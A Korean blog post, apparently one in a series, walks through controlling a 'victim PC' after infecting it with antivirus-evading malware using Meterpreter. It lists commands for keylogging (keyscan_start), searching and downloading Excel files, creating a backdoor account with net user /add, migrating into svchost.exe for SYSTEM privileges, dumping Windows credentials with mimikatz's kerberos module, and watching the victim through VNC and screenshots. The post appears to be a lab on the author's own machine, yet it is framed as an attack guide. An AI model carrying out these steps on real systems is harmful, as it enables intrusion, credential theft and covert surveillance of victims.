반응형




안녕들 하시죠 !


이번시간에는 악성코드를 이용하여 피해자PC를 장악해보겠습니다.

준비가 안되신 분들은 아래의 URL을 보고 따라해보시면 좋겠습니다.


https://hongpossible.tistory.com/36?category=770424 // 1. Veil-evasion을 이용한 백신에 탐지되지 않는 악성코드 만들기

https://hongpossible.tistory.com/37?category=770424 // 2. 악성코드와 정상적인 설치파일 합치기

https://hongpossible.tistory.com/38?category=770424 // 3. 악성코드 프로세스 목록에서 숨기기


우선, 지난시간에 프로세스목록에서 숨겼으니 잘 침투해 있는지 키스캔을 통해 확인해보겠습니다.


keyscan_start



확인을 위해 구글을 켜보고 원격 연결에 들어가보겠습니다.




덤프를 떠보니 잘 침투해 있는걸 확인할 수 있었습니다.



이번에는 피해자PC에 아무 엑셀파일이나 넣어놓고 진행했습니다.

download 명령어로 엑셀파일을 공격자PC로 받아보고, 악성코드를 보내기도 해보겠습니다.

우선 엑셀파일을 검색해보겠습니다.

search -f *.xlsx



C:\경로에 OS.xlsx라는 20136byte의 엑셀파일이 존재하네요. 

업, 다운로드를 명령어를 통해 실행했습니다.


이제 윈도우 shell로 들어가 백도어 계정을 만들고, 권한상승, 피해자PC 계정의 패스워드를 알아내보겠습니다.



shell -> net user /add 명령어로 백도어 계정을 만듭니다.


* 위 이미지처럼 ???? 형식으로 글자가 깨져서 나온다면 따라해보세요


Terminal -> Set Character Encoding -> Add or Remove



Available encodings: 에 있는 Korean EUC-KR 을 -> 화살표를 눌러 오른쪽 으로 추가시켜줍니다.



그다음 다시 Terminal -> Set Character Encoding -> Korean을 선택해줍니다.



성공






현재 getuid명령어로 확인해보면 Administrator의 권한입니다.

목표는 System 권한이기때문에 svchost.exe 로 migrate해야합니다.


ps -S svchost.exe



목록을 보면 SYSTEM권한으로 된 것이 3개가 있습니다. 

이중 912번을 선택해 migrate 하겠습니다.

getuid로 알아보면 SYSTEM으로 권한 상승이 되어있네요.


이제, 윈도우 계정정보를 알아내기위한 mimikatz를 사용하겠습니다.

load mimikatz



?를 입력해 명령어들을 알아보았습니다.

스크롤을 내리보면 여러 명령어 들이 있는데요.

저는 kerberos 기능을 사용하겠습니다.



생각보다 굉장히 간단하네요.

제가 실제로 사용하는 비밀번호라 조금 가렸습니다.



run vnc 명령어를 통해 피해자의 행위를 감시할 수도 있고, screenshot 명령어를 통해 피해자의 화면을 캡처할 수 있습니다.


오늘은 여기까지입니다 감사합니다 !

+ Recent posts